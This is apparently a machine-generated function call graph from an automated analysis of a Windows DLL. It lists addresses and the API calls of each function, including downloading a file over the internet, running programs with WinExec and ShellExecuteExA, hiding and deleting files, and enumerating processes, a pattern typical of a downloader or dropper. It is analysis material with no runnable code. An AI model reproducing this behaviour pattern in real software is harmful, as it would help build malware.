11116->11117 11118 1000b245 ShellExecuteExA 11117->11118 11119 1000b270 11118->11119 11120 1000b29b 11118->11120 11122 1000b279 WaitForSingleObject CloseHandle 11119->11122 11176 1000b296 11119->11176 11121 10002cb0 _invalid_parameter_noinfo_noreturn 11120->11121 11123 1000b2b4 11121->11123 11122->11176 11125 10002cb0 _invalid_parameter_noinfo_noreturn 11123->11125 11124 1000b3a3 Sleep 11126 1000b3ba 11124->11126 11127 1000b2c3 11125->11127 11128 10002da0 8 API calls 11126->11128 11129 10002cb0 _invalid_parameter_noinfo_noreturn 11127->11129 11130 1000b3c6 11128->11130 11131 1000b2d2 11129->11131 11260 10005740 11130->11260 11133 10002cb0 _invalid_parameter_noinfo_noreturn 11131->11133 11135 1000b2e1 11133->11135 11134 1000b3d6 11136 10002cb0 _invalid_parameter_noinfo_noreturn 11134->11136 11137 10002cb0 _invalid_parameter_noinfo_noreturn 11135->11137 11138 1000b3e8 11136->11138 11139 1000b2f0 11137->11139 11142 10002da0 8 API calls 11138->11142 11140 10002cb0 _invalid_parameter_noinfo_noreturn 11139->11140 11141 1000b2ff 11140->11141 11143 10002cb0 _invalid_parameter_noinfo_noreturn 11141->11143 11144 1000b400 11142->11144 11145 1000b30e 11143->11145 11147 10005740 SetFileAttributesA 11144->11147 11146 10002cb0 _invalid_parameter_noinfo_noreturn 11145->11146 11148 1000b31d 11146->11148 11149 1000b410 11147->11149 11150 10002cb0 _invalid_parameter_noinfo_noreturn 11148->11150 11151 10002cb0 _invalid_parameter_noinfo_noreturn 11149->11151 11152 1000b32c 11150->11152 11153 1000b422 11151->11153 11154 10002cb0 _invalid_parameter_noinfo_noreturn 11152->11154 11156 10005520 DeleteFileA 11153->11156 11155 1000b33b 11154->11155 11157 10002cb0 _invalid_parameter_noinfo_noreturn 11155->11157 11158 1000b434 11156->11158 11159 1000b34a 11157->11159 11162 10005520 DeleteFileA 11158->11162 11160 10002cb0 _invalid_parameter_noinfo_noreturn 11159->11160 11161 1000b359 11160->11161 11163 10012620 _invalid_parameter_noinfo_noreturn 11161->11163 11164 1000b448 11162->11164 11165 1000b368 11163->11165 11166 10002cb0 _invalid_parameter_noinfo_noreturn 11164->11166 11167 10012620 _invalid_parameter_noinfo_noreturn 11165->11167 11168 1000b464 11166->11168 11169 1000b377 11167->11169 11170 10002cb0 _invalid_parameter_noinfo_noreturn 11168->11170 11171 10002cb0 _invalid_parameter_noinfo_noreturn 11169->11171 11172 1000b473 11170->11172 11173 1000b386 11171->11173 11175 10002cb0 _invalid_parameter_noinfo_noreturn 11172->11175 11174 10002cb0 _invalid_parameter_noinfo_noreturn 11173->11174 11174->11176 11177 1000b482 11175->11177 11176->11124 11178 1000b548 11176->11178 11179 10002cb0 _invalid_parameter_noinfo_noreturn 11177->11179 11180 1000b491 11179->11180 11181 10002cb0 _invalid_parameter_noinfo_noreturn 11180->11181 11182 1000b4a0 11181->11182 11183 10002cb0 _invalid_parameter_noinfo_noreturn 11182->11183 11184 1000b4af 11183->11184 11185 10002cb0 _invalid_parameter_noinfo_noreturn 11184->11185 11186 1000b4be 11185->11186 11187 10002cb0 _invalid_parameter_noinfo_noreturn 11186->11187 11188 1000b4cd 11187->11188 11189 10002cb0 _invalid_parameter_noinfo_noreturn 11188->11189 11190 1000b4dc 11189->11190 11191 10002cb0 _invalid_parameter_noinfo_noreturn 11190->11191 11192 1000b4eb 11191->11192 11193 10002cb0 _invalid_parameter_noinfo_noreturn 11192->11193 11194 1000b4fa 11193->11194 11195 10002cb0 _invalid_parameter_noinfo_noreturn 11194->11195 11196 1000b509 11195->11196 11197 10012620 _invalid_parameter_noinfo_noreturn 11196->11197 11198 1000b518 11197->11198 11199 10012620 _invalid_parameter_noinfo_noreturn 11198->11199 11200 1000b527 11199->11200 11201 10002cb0 _invalid_parameter_noinfo_noreturn 11200->11201 11202 1000b536 11201->11202 11203 10002cb0 _invalid_parameter_noinfo_noreturn 11202->11203 11203->11178 11205 1000500a 11204->11205 11263 100125c0 11205->11263 11207 10005028 11210 100050db _Error_objects 11207->11210 11279 10012600 11207->11279 11269 100137c0 11210->11269 11211 100050f7 11215 10012600 9 API calls 11211->11215 11212 1000512c 11213 10012600 9 API calls 11212->11213 11216 1000515c 11213->11216 11215->11210 11218 10012600 9 API calls 11216->11218 11217 100051dd 11273 10004ee0 MultiByteToWideChar 11217->11273 11219 1000518a 11218->11219 11221 100051ef 11222 10002da0 8 API calls 11221->11222 11223 10005201 _MallocaArrayHolder 11222->11223 11224 10002cb0 _invalid_parameter_noinfo_noreturn 11223->11224 11225 1000522b 11224->11225 11226 10012620 _invalid_parameter_noinfo_noreturn 11225->11226 11227 1000523a 11226->11227 11227->10940 11231 10005280 11228->11231 11230 100052c2 11233 10002cb0 _invalid_parameter_noinfo_noreturn 11230->11233 11231->11230 11341 10012780 11231->11341 11345 100129e0 11231->11345 11234 100052e6 11233->11234 11234->10962 11406 100143c0 11235->11406 11237 100138e9 11237->10968 11239 10005531 11238->11239 11239->10974 11449 100124a0 11240->11449 11243 100053a7 11458 100053d0 11243->11458 11245 100053b9 11245->10979 11246 10005357 11247 1000536f ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBD_J 11246->11247 11453 10012400 11247->11453 11249 10005395 11250 1000539f SetFileAttributesA 11249->11250 11250->11243 11252 100139b5 HandleT Concurrency::task_continuation_context::task_continuation_context 11251->11252 11253 100139e5 11252->11253 11552 10001410 ?_Xlength_error@std@@YAXPBD 11252->11552 11544 100146c0 11253->11544 11256 1000a87f 11257 10013a30 11256->11257 11258 100128b0 Concurrency::task_continuation_context::task_continuation_context 9 API calls 11257->11258 11259 10013a48 11258->11259 11259->11021 11261 10002b60 11260->11261 11262 10005750 SetFileAttributesA 11261->11262 11262->11134 11265 100125cf 11263->11265 11264 100125f3 11264->11207 11265->11264 11266 100125e6 11265->11266 11282 10013090 ?_Xlength_error@std@@YAXPBD 11265->11282 11283 10013b70 11266->11283 11270 100137f5 HandleT 11269->11270 11271 10013832 _Error_objects 11270->11271 11299 10014ab0 11270->11299 11271->11217 11320 10016360 11273->11320 11275 10004f1b memset MultiByteToWideChar WideCharToMultiByte 11276 10016360 11275->11276 11277 10004f7e memset WideCharToMultiByte 11276->11277 11278 10004fc2 _MallocaArrayHolder 11277->11278 11278->11221 11321 10013c60 11279->11321 11281 100050c9 11281->11210 11281->11211 11281->11212 11282->11266 11284 10013b9d Concurrency::task_continuation_context::task_continuation_context 11283->11284 11285 10004a70 Concurrency::task_continuation_context::task_continuation_context 6 API calls 11284->11285 11286 10013bcf 11285->11286 11291 10014bd0 11286->11291 11292 10014bf4 HandleT 11291->11292 11293 100152a0 memcpy 11292->11293 11294 10013bf5 11293->11294 11295 100142f0 11294->11295 11297 10014301 _Error_objects Concurrency::task_continuation_context::task_continuation_context 11295->11297 11296 10013c42 11296->11264 11297->11296 11298 10003a90 allocator _invalid_parameter_noinfo_noreturn 11297->11298 11298->11296 11300 10014adc Concurrency::task_continuation_context::task_continuation_context 11299->11300 11303 10014b1c Concurrency::task_continuation_context::task_continuation_context 11300->11303 11309 10001410 ?_Xlength_error@std@@YAXPBD 11300->11309 11302 10014b3f Concurrency::task_continuation_context::task_continuation_context 11310 10015250 11302->11310 11303->11302 11304 100048e0 Concurrency::task_continuation_context::task_continuation_context 6 API calls 11303->11304 11304->11302 11306 10014b8b _Error_objects 11313 100151a0 11306->11313 11309->11303 11317 100153c0 11310->11317 11314 10014bbe 11313->11314 11315 100151af 11313->11315 11314->11271 11316 10003230 _invalid_parameter_noinfo_noreturn 11315->11316 11316->11314 11318 100152a0 memcpy 11317->11318 11319 10015264 11318->11319 11319->11306 11322 10013c93 11321->11322 11324 10013c85 11321->11324 11325 10014d00 11322->11325 11324->11281 11326 10014d2d Concurrency::task_continuation_context::task_continuation_context 11325->11326 11327 10014d6f 11326->11327 11340 10013090 ?_Xlength_error@std@@YAXPBD 11326->11340 11329 10004a70 Concurrency::task_continuation_context::task_continuation_context 6 API calls 11327->11329 11330 10014d95 HandleT 11329->11330 11331 10014e06 11330->11331 11332 10014de8 11330->11332 11334 10014bd0 memcpy 11331->11334 11333 10014bd0 memcpy 11332->11333 11337 10014e01 11333->11337 11335 10014e1d 11334->11335 11336 10014bd0 memcpy 11335->11336 11336->11337 11338 100142f0 _invalid_parameter_noinfo_noreturn 11337->11338 11339 10014ea1 11338->11339 11339->11324 11340->11327 11342 1001279a Concurrency::task_continuation_context::task_continuation_context 11341->11342 11349 10013e30 11342->11349 11346 100129fa Concurrency::task_continuation_context::task_continuation_context 11345->11346 11356 10013280 11346->11356 11350 100127ca 11349->11350 11351 10013e3e 11349->11351 11350->11231 11351->11350 11354 100049b0 memchr 11351->11354 11355 100049e0 memcmp 11351->11355 11354->11351 11355->11351 11357 10003980 ?_Xout_of_range@std@@YAXPBD 11356->11357 11358 1001329b 11357->11358 11359 100132e0 11358->11359 11360 100132bc Concurrency::task_continuation_context::task_continuation_context 11358->11360 11361 10013361 11359->11361 11362 10013300 Concurrency::task_continuation_context::task_continuation_context 11359->11362 11376 100039e0 memcpy 11360->11376 11363 1001342d 11361->11363 11368 1001337c Concurrency::task_continuation_context::task_continuation_context 11361->11368 11377 100039e0 memcpy 11362->11377 11382 10014100 11363->11382 11366 10012a15 11366->11231 11379 100039e0 memcpy 11368->11379 11369 10013325 11378 100039e0 memcpy 11369->11378 11372 100133f1 11380 100039e0 memcpy 11372->11380 11374 10013405 11381 100036d0 memcpy 11374->11381 11376->11366 11377->11369 11378->11366 11379->11372 11380->11374 11381->11366 11383 10014120 Concurrency::task_continuation_context::task_continuation_context 11382->11383 11385 1001412d Concurrency::task_continuation_context::task_continuation_context 11383->11385 11395 10001410 ?_Xlength_error@std@@YAXPBD 11383->11395 11386 100048e0 Concurrency::task_continuation_context::task_continuation_context 6 API calls 11385->11386 11387 10014167 HandleT _Error_objects 11386->11387 11388 1001419c HandleT 11387->11388 11389 100141ef 11387->11389 11396 10013460 11388->11396 11390 10013460 memcpy 11389->11390 11393 100141e2 Concurrency::task_continuation_context::task_continuation_context 11390->11393 11393->11366 11394 10003910 Concurrency::task_continuation_context::task_continuation_context _invalid_parameter_noinfo_noreturn 11394->11393 11395->11385 11403 100036d0 memcpy 11396->11403 11398 10013478 11404 100036d0 memcpy 11398->11404 11400 1001348f 11405 100036d0 memcpy 11400->11405 11402 100134b8 11402->11394 11403->11398 11404->11400 11405->11402 11407 100143da Concurrency::task_continuation_context::task_continuation_context 11406->11407 11410 100148c0 11407->11410 11411 10003980 ?_Xout_of_range@std@@YAXPBD 11410->11411 11412 100148db 11411->11412 11413 100149bc 11412->11413 11416 1001490e Concurrency::task_continuation_context::task_continuation_context 11412->11416 11425 10014ff0 11413->11425 11415 100143f1 11415->11237 11422 100039e0 memcpy 11416->11422 11418 10014980 11423 100036d0 memcpy 11418->11423 11420 10014994 11424 100036d0 memcpy 11420->11424 11422->11418 11423->11420 11424->11415 11426 10015010 Concurrency::task_continuation_context::task_continuation_context 11425->11426 11428 1001501d Concurrency::task_continuation_context::task_continuation_context 11426->11428 11438 10001410 ?_Xlength_error@std@@YAXPBD 11426->11438 11429 100048e0 Concurrency::task_continuation_context::task_continuation_context 6 API calls 11428->11429 11430 10015057 HandleT _Error_objects 11429->11430 11431 100150db 11430->11431 11432 1001508c HandleT 11430->11432 11433 100149f0 memcpy 11431->11433 11439 100149f0 11432->11439 11437 100150ce Concurrency::task_continuation_context::task_continuation_context 11433->11437 11436 10003910 Concurrency::task_continuation_context::task_continuation_context _invalid_parameter_noinfo_noreturn 11436->11437 11437->11415 11438->11428 11446 100036d0 memcpy 11439->11446 11441 10014a08 11447 100036d0 memcpy 11441->11447 11443 10014a1f 11448 100036d0 memcpy 11443->11448 11445 10014a42 11445->11436 11446->11441 11447->11443 11448->11445 11450 100124bb 11449->11450 11461 10012f80 11450->11461 11514 10012f10 11453->11514 11456 10012434 11456->11249 11457 10012418 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N 11457->11456 11534 10012440 11458->11534 11460 100053e2 ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE 11460->11245 11462 10012fd0 HandleT 11461->11462 11463 10012fab ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE 11461->11463 11464 10012fe0 ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N 11462->11464 11463->11462 11471 10013680 ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE 11464->11471 11468 1001304f 11469 10013053 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N 11468->11469 11470 10005333 ??Bios_base@std@ 11468->11470 11469->11470 11470->11243 11470->11246 11483 10012e40 11471->11483 11474 100135c0 11475 100135e7 11474->11475 11476 100135eb ?_Fiopen@std@@YAPAU_iobuf@@PBDHH 11474->11476 11475->11468 11476->11475 11477 1001360d 11476->11477 11478 10012e40 3 API calls 11477->11478 11479 1001361b ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2 11478->11479 11489 10013a70 ??0_Lockit@std@@QAE@H ??Bid@locale@std@ 11479->11489 11481 10013642 11499 10012cd0 ?always_noconv@codecvt_base@std@ 11481->11499 11484 10012e4f ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 11483->11484 11486 10012e7f 11484->11486 11487 10012ede 11484->11487 11486->11487 11488 10012e88 _get_stream_buffer_pointers ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXPAPAD0PAH001 11486->11488 11487->11474 11488->11487 11503 10004cc0 11489->11503 11492 10013b47 ??1_Lockit@std@@QAE 11492->11481 11493 10013ad7 ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@ 11494 10013af5 11493->11494 11495 10013aed 11493->11495 11510 10015eef malloc 11494->11510 11507 10004c10 11495->11507 11498 10013acf 11498->11492 11500 10012cf3 HandleT 11499->11500 11501 10012ce7 11499->11501 11502 10012cfc ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 11500->11502 11501->11475 11502->11501 11504 10004cd7 11503->11504 11505 10004d11 ?_Getgloballocale@locale@std@@CAPAV_Locimp@12 11504->11505 11506 10004d0c 11504->11506 11505->11506 11506->11492 11506->11493 11506->11498 11508 10004be0 std::bad_alloc::bad_alloc 11507->11508 11509 10004c1e _CxxThrowException 11508->11509 11509->11498 11511 10015f02 11510->11511 11512 10015f17 ?_Xbad_alloc@std@ 11510->11512 11511->11498 11513 10015f1d 11512->11513 11513->11498 11515 10012f22 11514->11515 11523 10012f5a 11514->11523 11524 10012c90 ?eback@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 11515->11524 11518 10012e40 3 API calls 11520 10012414 11518->11520 11520->11456 11520->11457 11523->11518 11525 10012cc9 11524->11525 11526 10012caa ?setg@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXPAD00 11524->11526 11527 10012d20 11525->11527 11526->11525 11528 10012d32 Concurrency::task_continuation_context::task_continuation_context 11527->11528 11533 10012d3d fclose 11527->11533 11529 10012d8a ?unshift@?$codecvt@DDU_Mbstatet@@@std@@QBEHAAU_Mbstatet@@PAD1AAPAD 11528->11529 11528->11533 11530 10012dbf 11529->11530 11531 10012de1 fwrite 11530->11531 11530->11533 11532 10012e00 11531->11532 11531->11533 11532->11533 11533->11523 11537 10012390 11534->11537 11536 10012482 ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UAE 11536->11460 11538 100123be 11537->11538 11541 100123c6 11537->11541 11539 10012c90 2 API calls 11538->11539 11539->11541 11540 100123db ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE 11540->11536 11541->11540 11542 10012f10 8 API calls 11541->11542 11543 100123da 11542->11543 11543->11540 11549 100146ec HandleT Concurrency::task_continuation_context::task_continuation_context 11544->11549 11545 10014782 HandleT Concurrency::task_continuation_context::task_continuation_context 11553 100036d0 memcpy 11545->11553 11547 100147ca 11554 100036d0 memcpy 11547->11554 11549->11545 11551 100048e0 Concurrency::task_continuation_context::task_continuation_context 6 API calls 11549->11551 11550 100147e1 _Error_objects Concurrency::task_continuation_context::task_continuation_context 11550->11256 11551->11545 11552->11253 11553->11547 11554->11550 11556 1000b5a8 11555->11556 11557 10002da0 8 API calls 11556->11557 11558 1000b5be 11557->11558 11795 10005540 GetModuleFileNameA 11558->11795 11560 1000b5d1 _Smanip _Error_objects 11561 10012640 9 API calls 11560->11561 11562 1000bc37 _Smanip _Error_objects 11561->11562 11563 10012640 9 API calls 11562->11563 11564 10010552 11563->11564 11565 10005400 9 API calls 11564->11565 11566 10010569 11565->11566 11567 10005400 9 API calls 11566->11567 11568 10010583 _Error_objects 11567->11568 11569 10004fe0 17 API calls 11568->11569 11570 100105bf 11569->11570 11571 10002cd0 _invalid_parameter_noinfo_noreturn 11570->11571 11572 100105da 11571->11572 11573 10002cb0 _invalid_parameter_noinfo_noreturn 11572->11573 11574 100105e5 11573->11574 11575 10004fe0 17 API calls 11574->11575 11576 100105f9 11575->11576 11577 10002cd0 _invalid_parameter_noinfo_noreturn 11576->11577 11578 10010614 11577->11578 11579 10002cb0 _invalid_parameter_noinfo_noreturn 11578->11579 11580 1001061f _Smanip _Error_objects 11579->11580 11581 10012640 9 API calls 11580->11581 11582 10010770 11581->11582 11583 10005400 9 API calls 11582->11583 11584 10010787 11583->11584 11585 10012620 _invalid_parameter_noinfo_noreturn 11584->11585 11586 10010799 11585->11586 11587 10002e20 8 API calls 11586->11587 11588 100107bf 11587->11588 11589 10005250 13 API calls 11588->11589 11590 100107cb _Smanip _Error_objects 11589->11590 11591 10012640 9 API calls 11590->11591 11592 10010881 11591->11592 11593 10005400 9 API calls 11592->11593 11594 10010898 11593->11594 11595 100138d0 11 API calls 11594->11595 11596 100108cb 11595->11596 11597 10002cb0 _invalid_parameter_noinfo_noreturn 11596->11597 11598 100108dd 11597->11598 11599 10012620 _invalid_parameter_noinfo_noreturn 11598->11599 11600 100108ec 11599->11600 11601 10005520 DeleteFileA 11600->11601 11602 100108fe 11601->11602 11603 10002da0 8 API calls 11602->11603 11604 10010918 11603->11604 11605 10005300 31 API calls 11604->11605 11606 1001092f 11605->11606 11607 10002cb0 _invalid_parameter_noinfo_noreturn 11606->11607 11608 10010941 Sleep 11607->11608 11609 10010959 11608->11609 11610 10002da0 8 API calls 11609->11610 11611 10010965 _Smanip _Error_objects 11610->11611 11612 10012640 9 API calls 11611->11612 11613 100109da 11612->11613 11614 10005400 9 API calls 11613->11614 11615 100109f1 11614->11615 11616 10002e20 8 API calls 11615->11616 11617 10010a3b 11616->11617 11618 10005250 13 API calls 11617->11618 11619 10010a47 11618->11619 11620 10002cb0 _invalid_parameter_noinfo_noreturn 11619->11620 11621 10010a5f 11620->11621 11622 10012620 _invalid_parameter_noinfo_noreturn 11621->11622 11623 10010a6e 11622->11623 11624 10002cb0 _invalid_parameter_noinfo_noreturn 11623->11624 11625 10010a7d 11624->11625 11626 10002da0 8 API calls 11625->11626 11627 10010a95 _Smanip _Error_objects 11626->11627 11628 10012640 9 API calls 11627->11628 11629 10010b0e 11628->11629 11630 10005400 9 API calls 11629->11630 11631 10010b25 11630->11631 11632 10002e20 8 API calls 11631->11632 11633 10010b6f 11632->11633 11634 10005250 13 API calls 11633->11634 11635 10010b7b 11634->11635 11636 10002cd0 _invalid_parameter_noinfo_noreturn 11635->11636 11637 10010ba2 11636->11637 11638 10002cb0 _invalid_parameter_noinfo_noreturn 11637->11638 11639 10010bad 11638->11639 11640 10002cb0 _invalid_parameter_noinfo_noreturn 11639->11640 11641 10010bbc 11640->11641 11642 10012620 _invalid_parameter_noinfo_noreturn 11641->11642 11643 10010bcb 11642->11643 11644 10002cb0 _invalid_parameter_noinfo_noreturn 11643->11644 11645 10010bda 11644->11645 11646 100139a0 8 API calls 11645->11646 11647 10010bf3 11646->11647 11648 10013a30 9 API calls 11647->11648 11649 10010c21 11648->11649 11650 10013a30 9 API calls 11649->11650 11651 10010c4f 11650->11651 11652 10013a30 9 API calls 11651->11652 11653 10010c7d 11652->11653 11654 10013a30 9 API calls 11653->11654 11655 10010cab 11654->11655 11656 10013a30 9 API calls 11655->11656 11657 10010cd9 11656->11657 11658 10013a30 9 API calls 11657->11658 11659 10010d07 11658->11659 11660 10013a30 9 API calls 11659->11660 11661 10010d35 11660->11661 11662 10013a30 9 API calls 11661->11662 11663 10010d63 11662->11663 11664 10013a30 9 API calls 11663->11664 11665 10010d91 11664->11665 11666 10013a30 9 API calls 11665->11666 11667 10010dbf 11666->11667 11668 10013a30 9 API calls 11667->11668 11669 10010ded 11668->11669 11670 10002cb0 _invalid_parameter_noinfo_noreturn 11669->11670 11671 10010dff 11670->11671 11672 10002cb0 _invalid_parameter_noinfo_noreturn 11671->11672 11673 10010e0e 11672->11673 11674 10002cb0 _invalid_parameter_noinfo_noreturn 11673->11674 11675 10010e1d 11674->11675 11676 10002cb0 _invalid_parameter_noinfo_noreturn 11675->11676 11677 10010e2c 11676->11677 11678 10002cb0 _invalid_parameter_noinfo_noreturn 11677->11678 11679 10010e3b 11678->11679 11680 10002cb0 _invalid_parameter_noinfo_noreturn 11679->11680 11681 10010e4a 11680->11681 11682 10002cb0 _invalid_parameter_noinfo_noreturn 11681->11682 11683 10010e59 11682->11683 11684 10002cb0 _invalid_parameter_noinfo_noreturn 11683->11684 11685 10010e68 11684->11685 11686 10002cb0 _invalid_parameter_noinfo_noreturn 11685->11686 11687 10010e77 11686->11687 11688 10002cb0 _invalid_parameter_noinfo_noreturn 11687->11688 11689 10010e86 11688->11689 11690 10002cb0 _invalid_parameter_noinfo_noreturn 11689->11690 11691 10010e95 11690->11691 11692 10005520 DeleteFileA 11691->11692 11693 10010ea7 11692->11693 11694 10002da0 8 API calls 11693->11694 11695 10010ec1 11694->11695 11696 10005300 31 API calls 11695->11696 11697 10010ed8 11696->11697 11698 10002cb0 _invalid_parameter_noinfo_noreturn 11697->11698 11699 10010eea Sleep 11698->11699 11700 10010f02 _Smanip _Error_objects 11699->11700 11701 10012640 9 API calls 11700->11701 11702 10011151 11701->11702 11703 10005400 9 API calls 11702->11703 11704 10011168 _Smanip _Error_objects 11703->11704 11705 10012640 9 API calls 11704->11705 11706 1001120e 11705->11706 11707 10005400 9 API calls 11706->11707 11708 10011225 11707->11708 11709 10013890 9 API calls 11708->11709 11710 10011264 11709->11710 11711 10002cb0 _invalid_parameter_noinfo_noreturn 11710->11711 11712 10011276 11711->11712 11713 10012620 _invalid_parameter_noinfo_noreturn 11712->11713 11714 10011285 11713->11714 11715 10002cb0 _invalid_parameter_noinfo_noreturn 11714->11715 11716 10011294 11715->11716 11717 10012620 _invalid_parameter_noinfo_noreturn 11716->11717 11718 100112a3 11717->11718 11719 100112b1 WinExec 11718->11719 11720 100112c4 _Smanip _Error_objects 11719->11720 11721 10012640 9 API calls 11720->11721 11722 100113fd 11721->11722 11723 10005400 9 API calls 11722->11723 11724 10011414 11723->11724 11725 10012620 _invalid_parameter_noinfo_noreturn 11724->11725 11726 10011426 _Smanip _Error_objects 11725->11726 11727 10012640 9 API calls 11726->11727 11728 100114b9 11727->11728 11729 10005400 9 API calls 11728->11729 11730 100114d0 11729->11730 11731 10003bc0 10 API calls 11730->11731 11732 10011503 11731->11732 11733 10003b90 10 API calls 11732->11733 11734 10011542 11733->11734 11735 10002cd0 _invalid_parameter_noinfo_noreturn 11734->11735 11736 1001155d 11735->11736 11737 10002cb0 _invalid_parameter_noinfo_noreturn 11736->11737 11738 10011568 11737->11738 11739 10002cb0 _invalid_parameter_noinfo_noreturn 11738->11739 11740 10011577 11739->11740 11741 10002cb0 _invalid_parameter_noinfo_noreturn 11740->11741 11742 10011586 11741->11742 11743 10012620 _invalid_parameter_noinfo_noreturn 11742->11743 11744 10011595 11743->11744 11745 100115a3 WinExec Sleep 11744->11745 11746 100115c1 11745->11746 11747 10002da0 8 API calls 11746->11747 11748 100115cd 11747->11748 11749 10005740 SetFileAttributesA 11748->11749 11750 100115dd 11749->11750 11751 10002cb0 _invalid_parameter_noinfo_noreturn 11750->11751 11752 100115ef 11751->11752 11753 10002da0 8 API calls 11752->11753 11754 10011607 11753->11754 11755 10005740 SetFileAttributesA 11754->11755 11756 10011617 11755->11756 11757 10002cb0 _invalid_parameter_noinfo_noreturn 11756->11757 11758 10011629 11757->11758 11759 10005520 DeleteFileA 11758->11759 11760 1001163b 11759->11760 11761 10005520 DeleteFileA 11760->11761 11762 1001164f 11761->11762 11763 10002cb0 _invalid_parameter_noinfo_noreturn 11762->11763 11764 1001166b 11763->11764 11765 10002cb0 _invalid_parameter_noinfo_noreturn 11764->11765 11766 1001167a 11765->11766 11767 10002cb0 _invalid_parameter_noinfo_noreturn 11766->11767 11768 10011689 11767->11768 11769 10002cb0 _invalid_parameter_noinfo_noreturn 11768->11769 11770 10011698 11769->11770 11771 10002cb0 _invalid_parameter_noinfo_noreturn 11770->11771 11772 100116a7 11771->11772 11773 10002cb0 _invalid_parameter_noinfo_noreturn 11772->11773 11774 100116b6 11773->11774 11775 10002cb0 _invalid_parameter_noinfo_noreturn 11774->11775 11776 100116c5 11775->11776 11777 10002cb0 _invalid_parameter_noinfo_noreturn 11776->11777 11778 100116d4 11777->11778 11779 10002cb0 _invalid_parameter_noinfo_noreturn 11778->11779 11780 100116e3 11779->11780 11781 10002cb0 _invalid_parameter_noinfo_noreturn 11780->11781 11782 100116f2 11781->11782 11783 10002cb0 _invalid_parameter_noinfo_noreturn 11782->11783 11784 10011701 11783->11784 11785 10002cb0 _invalid_parameter_noinfo_noreturn 11784->11785 11786 10011710 11785->11786 11787 10012620 _invalid_parameter_noinfo_noreturn 11786->11787 11788 1001171f 11787->11788 11789 10012620 _invalid_parameter_noinfo_noreturn 11788->11789 11790 1001172e 11789->11790 11791 10002cb0 _invalid_parameter_noinfo_noreturn 11790->11791 11792 1001173d 11791->11792 11793 10002cb0 _invalid_parameter_noinfo_noreturn 11792->11793 11794 1001174f 11793->11794 11796 10002da0 8 API calls 11795->11796 11797 10005588 11796->11797 11798 10002ad0 9 API calls 11797->11798 11799 100055b6 11798->11799 11800 10002ad0 9 API calls 11799->11800 11801 100055cf 11800->11801 11829 10012730 11801->11829 11804 10002ad0 9 API calls 11805 100055fa 11804->11805 11806 10002ad0 9 API calls 11805->11806 11810 10005613 _Error_objects 11806->11810 11807 1000567a 11839 10013910 11807->11839 11810->11807 11833 10012a40 11810->11833 11836 10012a20 11810->11836 11813 10003bc0 10 API calls 11814 100056b5 11813->11814 11815 10002cb0 _invalid_parameter_noinfo_noreturn 11814->11815 11816 100056d0 11815->11816 11817 10002cb0 _invalid_parameter_noinfo_noreturn 11816->11817 11818 100056dc 11817->11818 11819 10002cb0 _invalid_parameter_noinfo_noreturn 11818->11819 11820 100056eb 11819->11820 11821 10002cb0 _invalid_parameter_noinfo_noreturn 11820->11821 11822 100056fa 11821->11822 11823 10002cb0 _invalid_parameter_noinfo_noreturn 11822->11823 11824 10005706 11823->11824 11825 10002cb0 _invalid_parameter_noinfo_noreturn 11824->11825 11826 10005715 11825->11826 11827 10002cb0 _invalid_parameter_noinfo_noreturn 11826->11827 11828 10005724 11827->11828 11828->11560 11830 10012742 Concurrency::task_continuation_context::task_continuation_context 11829->11830 11831 10013e30 2 API calls 11830->11831 11832 100055e2 11831->11832 11832->11804 11834 10002c20 10 API calls 11833->11834 11835 10012a53 11834->11835 11835->11810 11837 100128b0 Concurrency::task_continuation_context::task_continuation_context 9 API calls 11836->11837 11838 10012a34 11837->11838 11838->11810 11840 10013925 Concurrency::task_continuation_context::task_continuation_context 11839->11840 11842 10013948 11840->11842 11845 10001410 ?_Xlength_error@std@@YAXPBD 11840->11845 11843 100146c0 7 API calls 11842->11843 11844 10005691 11843->11844 11844->11813 11845->11842 11846 100018d0 11847 100018f1 GetModuleHandleA CreateWindowExW SetWindowTheme SendMessageW malloc 11846->11847 11848 100018e2 11846->11848 11854 10002b60 11847->11854 11849 100019c2 PostQuitMessage 11848->11849 11850 100018ec DefWindowProcW 11848->11850 11853 100019e5 11849->11853 11850->11853 11855 100019a2 CreateThread 11854->11855 11855->11853 11856 100019f0 11855->11856 11859 10002090 11856->11859 11858 10001a13 11901 10017290 11859->11901 11862 10002143 SendMessageW 11863 1000215a InternetReadFile 11862->11863 11864 1000223c 7 API calls 11863->11864 11866 1000217c 11863->11866 11868 100022b4 11864->11868 11865 10002186 fwrite 11865->11866 11866->11863 11866->11864 11866->11865 11867 10002226 SendMessageW 11866->11867 11867->11866 11903 10001d80 VariantClear 11868->11903 11870 10002776 11904 10001d80 VariantClear 11870->11904 11872 10002785 11905 10001d80 VariantClear 11872->11905 11874 10002794 11906 10001d80 VariantClear 11874->11906 11876 100027a6 11907 10001a20 11876->11907 11878 100027cc 11912 10001b40 11878->11912 11881 10002926 exit 11881->11858 11884 10002915 Sleep 11884->11881 11885 1000284d 11920 10001e30 11885->11920 11887 1000285b 11888 10002913 11887->11888 11889 1000287a Sleep 11887->11889 11888->11881 11895 10002867 11889->11895 11890 10002da0 8 API calls 11890->11895 11892 10002cb0 _invalid_parameter_noinfo_noreturn 11892->11895 11893 100028cf 11936 100029f0 11893->11936 11895->11887 11895->11888 11895->11890 11895->11892 11895->11893 11925 10001fa0 CreateToolhelp32Snapshot 11895->11925 11899 10002960 _invalid_parameter_noinfo_noreturn 11900 1000290b 11899->11900 11900->11888 11902 100020c6 InternetOpenA InternetOpenUrlA fopen HttpQueryInfoW 11901->11902 11902->11862 11902->11863 11903->11870 11904->11872 11905->11874 11906->11876 11908 10001350 allocator 4 API calls 